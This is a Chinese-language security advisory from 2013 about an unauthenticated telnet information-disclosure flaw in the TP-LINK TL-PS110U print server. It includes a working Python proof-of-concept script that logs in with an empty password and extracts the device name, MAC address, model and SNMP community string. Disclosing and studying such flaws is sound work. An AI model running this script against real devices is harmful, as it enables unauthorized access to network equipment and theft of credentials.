PS110U打印服务器'tplink

发布日期:2013-06-19
更新日期:2013-06-23

受影响系统:
TP-LINK TL-PS110U
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60682
 
TL-PS110U是一款单USB口打印服务器,它是专门针对中小型企业、学校、家庭而设计,能够很好的为局域网上所有用户提供操作简单、方便快捷的共享打印方式。
 
TP-LINK TL-PS110U Print Server运行telnet服务时可使攻击者不经身份验证即可访问配置信息,包括设备名、MAC地址、厂商、型号、SNMP社区字符串。
 
<*来源:SANTHO
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import telnetlib
 import sys
 host = sys.argv[1]
 tn = telnetlib.Telnet(host)
 tn.read_until("Password:")
 tn.write("\r\n")
 tn.read_until("choice")
 tn.write("1\r\n")
 tn.read_until("choice")
 tn.write("1\r\n")
 data = tn.read_until("choice")
 for i in data.split("\r\n"):
    if "Device Name" in i:
        print i.strip()
    if "Node ID" in i:
        print i.strip()
 tn.write("0\r\n")
 tn.read_until("choice")
 tn.write("2\r\n")
 data = tn.read_until("choice")
 for i in data.split("\r\n"):
    if "Manufacture:" in i:
        print i.strip()
    if "Model:" in i:
        print i.strip()
 tn.write("0\r\n")
 tn.read_until("choice")
 tn.write("5\r\n")
 data = tn.read_until("choice")
 for i in data.split("\r\n"):
    if "Community" in i:
        print i.strip()

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
TP-LINK
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
?model=TL-PS110U

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxswf.html